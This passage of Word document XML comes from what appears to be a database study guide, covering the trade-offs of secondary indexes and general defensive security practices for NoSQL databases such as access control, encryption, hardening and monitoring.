          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Considerations and Trade-offs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64046E02" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index Maintenance Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD2BDB" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="465"/>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Secondary indexes require additional storage and maintenance, as the index must be updated whenever the indexed field is modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43881DF7" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consideration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that the benefits of faster queries outweigh the costs of index maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F2696A" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Write Performance Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C2FBCD" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="465"/>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Frequent writes and updates can be slower due to the overhead of maintaining indexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1842975B" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consideration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Balance the need for query performance with the impact on write operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB53428" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Storage Costs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9EC1EA" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="465"/>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Secondary indexes consume additional disk space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5482109D" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consideration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Monitor and manage storage to accommodate index growth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC43260" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Planning</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD5076" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="465"/>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Effective use of secondary indexes requires understanding query patterns and designing indexes that align with application needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38949290" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Consideration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Analyze query patterns and adjust index designs accordingly to maximize performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BFFEB4" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6B50E6" w14:textId="1171DCFE" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc178383325"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are some common security considerations in NoSQL databases?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w14:paraId="2EC436A0" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When working with NoSQL databases, security is a crucial aspect to consider, especially since these databases often manage large volumes of sensitive and critical data. While NoSQL databases offer flexibility and scalability, they also present unique security challenges that require careful planning and implementation. Below are some of the key security considerations for NoSQL databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38705CAF"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1. Authentication and Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A08721" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="466"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Strong Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that strong, multi-factor authentication (MFA) is in place to verify the identity of users and applications accessing the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6CE9DC" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="466"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Role-Based Access Control (RBAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement RBAC to grant users the minimum necessary permissions. Define roles with specific privileges and assign them to users based on their job responsibilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235473D7" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="466"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Principle of Least Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Limit permissions so that users and applications only have access to the data and operations they need. Avoid giving root or administrative access unless absolutely necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ECCD8D"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2. Data Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C96A13F" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data-at-Rest Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Encrypt data stored on disk to protect it from unauthorized access in case of a data breach or physical theft. This can be achieved using database-native encryption features or external encryption tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B4ADA8" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data-in-Transit Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Secure data transmitted between clients and servers using protocols such as TLS/SSL. This prevents man-in-the-middle attacks and eavesdropping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7376A93F" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement a robust key management system to securely generate, store, and rotate encryption keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A47BDF7"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3. Secure Configuration and Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F6BBF" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Default Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Avoid using default settings, as they are often well-known and easily exploitable. Customize configurations to meet your security requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE54F03" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Network Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use network segmentation, firewalls, and Virtual Private Networks (VPNs) to isolate the database from unauthorized access. Implement IP whitelisting to control access to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A14EAA7" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Configuration Hardening</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Disable unused services and interfaces, and ensure that only necessary ports are open. Regularly update and patch the database software to fix known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7AC3DD"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4. Auditing and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B8BBCC" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Activity Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Enable detailed logging of database activities, including login attempts, data access, changes, and administrative actions. This helps in detecting suspicious activities and providing audit trails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310931AA" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Real-Time Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Set up real-time monitoring and alerting for anomalous behavior, such as unusual query patterns, failed login attempts, or large data exports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C31535" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compliance Audits</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly audit your security posture to ensure compliance with regulatory requirements and industry standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1172E8"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5. Data Integrity and Availability</w:t>
      </w:r>
    </w:p>
